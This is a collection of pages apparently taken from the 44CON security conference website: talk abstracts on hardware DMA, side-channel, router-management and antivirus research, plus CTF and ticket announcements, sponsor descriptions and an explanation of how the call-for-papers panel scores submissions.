          Hardware hacks tend to focus on low-speed (jtag, uart) and external (network, usb) interfaces, and PCI Express is typically neither. After a crash course in PCIe Architecture, we’ll demonstrate a handful of hacks showing how pull PCIe outside of your system case and add PCIe slots to systems without them, including embedded platforms. We’ll top it off with a demonstration of SLOTSCREAMER, an inexpensive device that’s part of the NSA Playset which we’ve configured to access memory and IO, cross-platform and transparent to the OS – all by design with no 0-day needed. The open hardware and software framework that we will release will expand your Playset with the ability to tinker with DMA attacks to read memory, bypass software and hardware security measures, and directly attack other hardware devices in the system.


          Lessons Learned from Black Hat’s Infrastructure: The Tweets Must Flow

          Presented By: Conan Dooley

          Let’s take a quick trip across the sea to the halls of Black Hat. What made the training network tick? How was it created, who was attacking the network, and how was it defended? How do you keep the wired training network up and reliable when you have nearly two thousand people hammering on it? What tricks kept the wireless running for all those tweets?


          Side Channel attacks in the cloud

          Presented By: Gorka Irazoqui Apecechea

          This presentation exposes isolation vulnerabilities in cloud environments. First we present Bernstein’s attack applied in virtualization envionments and show that, for most crypographic libraries, the attack success on recovering part of the information of an AES key. Second we present an attack that exploits deduplication in cloud settings, which is used to share resource and save memory. We use flush and reload to recover the entire AES key in less than one minute. This work shows that more effort has to be done when designing isolation techniques and cryptographic libraries.


          A Year in Recap: I Am The Cavalry

          Presented By: Beau Woods

          In the face of clear & present threats to Body, Mind & Soul from our accelerating adoption of technology into our society it is clear: The Cavalry Isn’t Coming… it falls to us… the willing & able… and we have to try to have impact. Over the past year, the I Am The Cavalry initiative reduced its focus and increased its momentum. With a focus on public safety & human life we did our best collecting, connecting and collaborating to ensure the safer technology dependence in: Medical, Automotive, Home Electronics & Public Infrastructure.

          This will take place on the Wednesday Evening of 10th September


          I Hunt TR-069 Admins: Pwning ISPs Like a Boss

          Presented By: Shahar Tal

          Residential gateway (/SOHO router) exploitation is a rising trend in the security landscape – ever so often do we hear of yet another vulnerable device, with the occasional campaign targeted against specific versions of devices through independent scanning or Shodan dorking. We shine a bright light on TR-069/CWMP, the previously under-researched, de-facto CPE device management protocol, and specifically target ACS (Auto Configuration Server) software, whose pwnage can have devastating effects on critical amounts of users. These servers are, by design, in complete control of entire fleets of consumer premises devices, intended for use by ISPs and Telco providers. or nation-state adversaries, of course (sorry NSA, we know it was a cool attack vector with the best research-hours-to-mass-pwnage ratio). We investigate several TR-069 ACS platforms, and demonstrate multiple instances of poorly secured deployments, where we could have gained control over hundreds of thousands of devices. During the talk (pending patch availability), we will release exploits to vulnerabilities we discovered in ACS software, including RCEs on several platforms.


          Meterpreter Internals

          Presented By: OJ Reeves

          Everyone has heard of Metasploit, the Open Source exploitation framework, and most have probably come into contact with it on the attacking and/or receiving end. Meterpreter, Metasploit’s most frequently used payload for Windows systems, enables a tester who has gained control of one machine to perform further exploitation, pivoting and penetration with relative ease. But how does Meterpreter work? What goes on ‘under the hood’ when certain commands are executed? How does it avoid touching the disk and survive happily in memory? How does it hide from the operating system, and how could you locate it if it’s running? Let’s dive into the plumbing that makes Meterpreter tick. I will explain in relative detail its lifecycle, along with some of the ins and outs of topics such as Reflective DLL Injection and Migration. Bring your low-level knowledge and interest in technical details as we pop the hood of one of the most loved parts of Metasploit.


          Top 5 Media Fails

          Presented By: Dan Raywood

          It is very easy to criticise the media for getting their facts wrong, for talking to the wrong people and for a lack of knowledge of the more technical terms.

          In this presentation, one of the media’s own will look at the top five (in their opinion) media fails when it comes to security, try and understand why it was incorrect, what the mitigating factors were and ask the important question – are IT security and security journalists even on the same page?


          STOP! Don’t make that NOOB Incident Handling mistake

          Presented By: Steve Armstrong

          In the heat of an incident, when the boss is screaming as to what has happened, when and why, mistakes happen.

          Evidence is lost, compromised systems forgotten and data is not analyzed. During the last 20 years the speaker has fought APT attackers, Russian Cyber Criminals and internal Hacking Administrators. Each of these incidents has been an ‘enhanced experience’ because someone didn’t think just before some routine action was being completed. The result was the delayed closure of an incident, the destruction of evidence, the leaking of counter-hacking strategies to the attackers of just the wrong briefing.

          As developers of Security Operation Centres procedures and Incident Management Teams, we have seen many simple errors wreaking havoc mid incident. To prevent these we developed the Cyber Crisis Planning Room. A web based application to enable Incident Responders to work together and to have the computers doing more of the work. CyberCPR enables management to see progress and to dig into some of the details should they desire.


          When Documents Bite

          Presented By: Vlad Ovtchinikov

          In 1999, the Melissa virus changed the industries attitude on how malware could be spread. Seemingly safe formats, such as Microsoft Word and Adobe PDF were now being used to deliver the payload. A recent report on the subject found that malicious documents, as a method for delivering malware, are now the preferred method of delivery amongst attackers. In the Red October Diplomatic Cyber Attacks, Microsoft Office and PDF document files were used as the primary malware delivery vector.

          The primary reason why this attack vector has had such a high rate of success in social engineering attack campaigns is directly linked to its ability to effectively circumvent email and virus filtering solutions. By distributing a ubiquitous file type (such as *.doc, which is considered to be safe and an industry standard in document formats) that in most cases, able to reach the intended target.

          An analysis of the real world attack techniques used in malicious documents, is key in defending against targeted attacks; attacks that are one of the major IT security concern for enterprise networks.


          Hacking an Internet Enabled Lagomorph

          Presented By: Alex Chapman

          So, I have to admit, I got a little obsessed with this project. Who would have thought an internet enabled, hyperkinetic, 9.6-inch rabbity thing could hold so much intrigue. Little did I know that in procuring this geek toy I’d be delving down the proverbial rabbit hole of ARM exploitation, including reverse engineering, cross compiling, protocol analysis, 0days and producing exploits from vulnerability advisories. All this in an attempt to get remote code execution… on a rabbit… seriously!

          Throughout this talk I will discuss the processes and procedures used to identify and eventually exploit vulnerabilities on the Karotz “smart companion” (what else would I be talking about?). Vulnerabilities identified include authentication bypass, jump table corruptions and heap overflows which eventually lead to unauthenticated ear wiggling exploits. I wonder if this qualifies for a CVE? A couple of remote code execution bugs will also be discussed.


          Why TV news gets tech security wrong – and why it matters

          Presented By: Geoff White

          Tech security has become such a hot topic that even the most Luddite of TV news editors have been forced to include it in their running orders.

          The results have been a mixed bag, ranging from noble-yet-confusing attempts to convey accurate information, to downright ill-informed sensationalism.

          There are some good reasons why television news struggles with such stories: it’s a medium based on pictures, and technology is a subject chronically deprived of the kind of compelling imagery that makes headlines.

          Yet it’s a challenge with which journalists must engage. Firstly because we have a duty to give the public accurate, timely information about the issues which potentially affect them.

          Secondly, and more importantly for the 44CON audience, the more understanding there is of tech security and the issues around it, the easier it will be to win the boardroom battle for resources to protect individuals, businesses and the wider world from threats.


          Pentesting NoSQL DB’s Using NoSQL Exploitation Framework

          Presented By: Francis Alexander

          The rise of NoSQL databases and their simplicity has made corporates as well as end users have started to move towards NoSQL,However is it safe?.Does NoSQL mean we will not have to worry about Injection attacks. Yes We Do. This paper concentrates on exploiting NoSQL DB’s especially with its reach towards Mongodb,Couchdb and Redis and automating it using the NoSQL Exploitation Framework.


          Breaking AV Software

          Presented By: Joxean Koret

          Antivirus software is a common component of today’s computer systems ranging from home users to corporate and government servers. However, security issues related to the AV software itself are not usually considered when deploying such security solutions. Users are not fully conscious of the issues related to using AV software and some AV vendors do not put the required effort in securing their products. In this talk we will cover vulnerability discovery and remote exploitation of AV software. During the talk the details of a number of vulnerabilities will be published. The talk aims to raise the level of awareness about the security of AV software to both users and vendors.


          Bug Bounties – Relationship Advice for the Hunters & the Hunted

          Presented By: Katie Moussouris

          Bug bounties seem like simple enough concepts – put up some money, write up some rules of engagement, and off you go into the sunset hand in hand with hackers who love you all of a sudden. Except like all relationships, the ones forged between those offering a bug bounty and those looking to help them by reporting bugs and getting paid require some work to maintain. Join Katie Moussouris as she leads you on a brief relationship counseling session on bounties with tips on how to structure them, and how to reap the rewards from them, in ways that leave both parties feeling like they benefitted from the interaction.


          #####EOF##### 44CON News – 44CON

          CTF 2017

          This year we are delighted to announce that Immersive Labs will be running the 44CON 2017 CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          They will make their platform available to all 44CON participants, enabling you to take on over 150 cyber security challenges during the conference. Immersive Labs exercises combine both CTF style and sign-posted challenges ranging from Beginner to Advanced. 

          A real-time leaderboard will keep track of participants including the individual labs they’ve completed. Immersive Labs will be providing opportunities for the top 10 users to become “Immersive Original” lab producers which attract a £1000 payment for each lab.

           

           

          CTF

          This year we are delighted to announce that the Ministry of Justice will be running the CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          Prison break – Season 6 coming soon!

          Do you have what it takes to break into prison?MOJ_Logo_transparent (1)

          This year the 44CON CTF is being hosted by the Ministry of Justice. Your challenge is to release your friend by “breaking in” to prison through a series of networking, web, infrastructure and other challenges.

          We will host up to 20 teams of up to 5 people so, if you’re new, grab someone, team up or go solo to win a drone kit!

          Our platform is over IRC to make this accessible to as many hackers as possible. This is where you submit flags and unlock rooms. Each team will have their own virtual environment so you can use whichever tools you want but, remember, you can only bring your machine down if you play unfair. No DoSing us or other teams!

          Are you ready for the challenge?

          Tickets for 44CON 2016 are on sale

          44CON 2016 tickets are now on sale in our shop go and get yours now!

          We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto, go check them out and book your place early to avoid disappointment as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

          44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre, you can expect a jam packed few days of awesome talks, food and of course alcohol. 

          Our CFP closes tonight (Friday 10th June) so if you have something awesome to share get it in now before it’s too late.

          Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

          Dawid Czagan’s training course is still going ahead

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

          Do check it out!

          44CON Cyber Security 2016 Cancelled

          Unfortunately we’ve had some problems with the 44CON Cyber Security event that we just couldn’t overcome. Some of these issues were small, like crew numbers, while others such as unexpected price hikes for us were simply insurmountable without breaking the cost model. Furthermore, the presence of so many great events in the UK from BSides London and Manchester, through to Securitay meant that a separate event was becoming harder to justify in an already busy calendar.

          When we started 44CON Cyber Security last year, we set out to create an exhibition for the Infosec community without the infosuck. We wanted to create an event that was free (or at least super cheap), that was different to 44CON London but had its spirit (if not its Gin) and a place where people more involved in end-user business security functions could come together without the fear of heavy-handed barcode scanning. We believe we mostly succeeded, but only as a result of the enormous effort our crew of volunteers put in and Adrian’s hard work.

          Unfortunately this year both Adrian and Steve have had less time to work on 44CON Cyber Security, and with fewer volunteers able to plug the gaps, we felt that if we couldn’t deliver an event on par with last year that perhaps it would be better to focus on making 44CON London an even better event, which is what we’re going to do.

          We’ll be in touch with everyone with a ticket for 44CON Cyber Security to let them know that it’s not going ahead, and to give them the option of a full refund or discounted entry to 44CON London, and of course to apologise for any inconvenience. But it’s not all bad news…

          Traditionally, 44CON London has had an Infosec track and a technical track. Last year had no Infosec track because of 44CON Cyber Security. This year, the Infosec track will be back with a vengeance.

          It’s going to be awesome.

          If you have any questions, please email 44con@44con.com, and we’ll do our best.

          Adrian & Steve

          44CON Cyber Security Keynote Speaker Announced!


          David Davis
          We here are 44CON are delighted to announce that David Davis MP will be the Keynote Speaker at this year’s 44CON Cyber Security.

          David has been an elected MP since 1997 and since 2008 David has been a leading figure on the Conservative back benches. David is best known for being a strong defender of our civil liberties, but his considerable experience in ministerial and public posts means he is a respected speaker and commentator on Europe and the Eurozone crisis, banking, security, education and social mobility. David is one of the best known politicians in Britain and frequently appears locally and nationally on television and in the press. We can not wait to welcome him to 44CON Cyber Security 2016. 

          44CON Cyber Security 2016 will take place on Tuesday 26th April at the ILEC Conference Centre, London. To get your ticket please visit our shop. 

          44CON Cyber Security 2016 Speakers

          44con-csWe here at 44CON are delighted to announce the first three speakers to present at 44CON Cyber Security this year:

          • Meaningful Measurement: It’s About Time We Got This Right, Presented by Ian Trump
          • What it means to have the C word in the National Security agenda, Presented by Emil Tan
          • Data protection, privacy and cloud computing: navigating legal compliance, Presented by Graham McKay

          More speakers will be announced soon so keep a look out here and on our twitter page @44CON

          44CON Cyber Security will take place on Tuesday 26th April 2016 at the ILEC Conference Centre London. For tickets please visit our shop. This year for each ticket sold a £5.00 donation will be made to Barnardo’s.

           

          Training course at 44CON Cyber Security 2016

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

          Do check it out!

          #####EOF##### CREST – 44CON

          CREST

          crest-new

          CREST is the not-for-profit accreditation and certification body that represents and supports the technical information security market.

          CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services. All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected Executive of experienced security professionals who also promote and develop awareness, ethics and standards within the cyber security market.

          CREST also supports the industry by providing in-depth guidance material and commissioning detailed research projects. All CREST research is provided to the industry free of charge and is available from the CREST website.

          Visit our website for more information on CREST membership and examinations, to find an accredited service provider or to download our research: www.crest-approved.org

          Follow us on Twitter: @crestadvocate

          #####EOF##### 44CON Talks and Workshops announced – 44CON

          44CON Talks and Workshops announced

          Our CFP process has completed and we’re now putting talks and workshops up. We still have a few more to add, but there’s enough up to start checking out. So, what are we covering this year?This year’s talks are a heady mix of blue, red and purple team talks covering everything from bug bounties to hardware hacking, careers to cryptography and machine learning to mPoS. As always, expect to go from zero to hero, and get yer mind bent along the way. Here’s some of the talks we’re really looking forward to seeing.

          [NEW] They’re All Scorpions – Successful SecOps in a Hostile Workplace by Pete Herzog

          This talk looks at how we can shift our approach to SecOps to be (more) effective in places where it feels like nobody’s listening. Pete is a battle-scarred veteran of the world of information security, and doesn’t shy away from asking (and answering) the difficult questions.

          [NEW] Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties by Shubham Shah and Michael Gianarakis

          Bug bounties are an industry hot topic, with many people finding it hard to get in due to automation. Shubs and Mike are coming all the way from Australia to talk to us about ephemeral vulnerabilities: vulnerabilities that may pop up and disappear after short periods of time. They’ll share their secrets on industrializing bug bounty hunting, and we’ve been working with our sponsors Bugcrowd to come up with a 44CON-exclusive bug bounty to help you get started. This is a great talk for those looking to get into bug bounties, and also for those defending Internet-facing services with dynamically scaling architectures. This talk may feature some of the 300 bugs these guys have found over the past few years, but sadly it would not be possible to fit them all into a 45 minute slot.

          [UPDATED] For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems by Leigh-Anne Galloway and Tim Yunusov

          Ever make a payment using a mobile Point of Sale (mPoS) system such as square or iZettle? You know, the ones with the things that plug into some random person’s compromised phone that you use to make payments.

          It turns out that some mPoS systems are not as secure as people thought they were.

          It turns out that attacking some of these things isn’t hard.

          It turns out that the cost of tampering with some of these things is about £8.

          What could possibly go wrong?

          [NEW] Weak analogies make poor realities – are we sitting on a Security Debt Crisis? By Charl van der Walt

          Security is often framed in terms of risk, and we often back up our decisions with analogies. But are we genuinely using analogies correctly, or are we simply cherry picking to justify risk decisions? In this talk, Charl looks at our approach to analogies and risk management, and explores and compares the use of security debt as a decision-making tool.

          Charl also has an incredible workshop on deploying Microsoft’s Sysmon to help detect and defend against bad things on your networks. In itself, this is a great example of using security debt as a way of measuring investment in existing tools and people over buying new shiny boxes.

          Tickets are still available from our shop. Which talks and workshops are you looking forward to? Don’t forget to let us know on twitter!

          #####EOF##### TNMOC – 44CON

          TNMOC Guided Tour Giveaway

          Proudly sponsored by F-secure

          Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

          F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

          logo_f-Secure_Red-web

          The tour will last around 2 hours and cover the full museum collection from the Colossus, war code breaking machines and the history of computing from 1940 to the start of smart phone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

          After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

          How to enter:

          1. Sign up to our newsletter
          2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
          3. Keep an eye on your emails in mid August to see if you’re a winner

          Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

          Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

           

          #####EOF##### Facebook
          Meld je aan bij je Facebook-account om te delen.
          Nieuw account maken
          #####EOF##### SteelCon2018 Tickets up for Grabs! – 44CON

          SteelCon2018 Tickets up for Grabs!

          Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

          Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

          How to enter:

          For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

          1. Purchase a 44CON 2018 ticket
          2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

          Obligatory fine print:

          Don’t stress love, if you’ve already bought a  ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
          Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
          Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

          We’d love to see you at SteelCon!

          If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

          #####EOF##### IISSP – 44CON

          IISSP

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.IISP logo high-res centered

          Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

          At the heart of the Institute is the IISP Skills Framework©2012 which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes  including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits  training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience. 

          More information about the IISP and its work can be found at www.iisp.org.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### steelcon – 44CON

          Steelcon Ticket winners

          44CON Soldering Area at Steelcon

          Steelcon is coming up soon, Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

          We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

          And the winners are…

          After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

          We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

           

           

           

          #####EOF##### DSC_4985-1 – 44CON

          DSC_4985-1

          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favorite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### 44CON Training – 44CON

          44CON Training Goes Quarterly

          We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused course on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

          That’s right, you no longer have to wait a year to sit a high quality training course!

          Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

          Mastering Container Security – Rory McCune, NCC Group
          Malware Reverse Engineering – Joxean Koret

          Both courses are two-days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

          If you’d like to offer a high-end course in London, get in touch.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          A gypsy fortune teller brings her crystal ball to life to read the future.
          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.
          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.
          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          2 thoughts on “How to game the 44CON CFP

          Comments are closed.

          #####EOF##### DSC_5024-1 – 44CON

          DSC_5024-1

          #####EOF##### DSC_4861-1 – 44CON

          DSC_4861-1

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### Attending – 44CON

          Attending

          Our next event is 44CON 2019 on 11th, 12th & 13th of September 2019. It will take place at the ILEC Conference Centre, London and will kick off on Wednesday 11th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand (details closer to the event).

          Press registration is handled separately to normal attendance registration. Please see here for more info.

          Mark your calendars:

          Next 44CON Conferences will take place:

          • 2019: 11th, 12th  & 13th of September 2019
          • 2020: 9th, 10th & 11th of September 2020

          In the spirit of making 44CON safe and enjoyable for everyone, please ensure you adhere to our house rules at all times at and around the event.

          More information will be added to this page as it becomes available so please check it regularly. You can also keep a look out on our twitter page @44CON or sign up to our mailing list where you will be the first to know about all things 44CON.

          #####EOF##### 44CON 2018 CFP Is Open! – 44CON

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

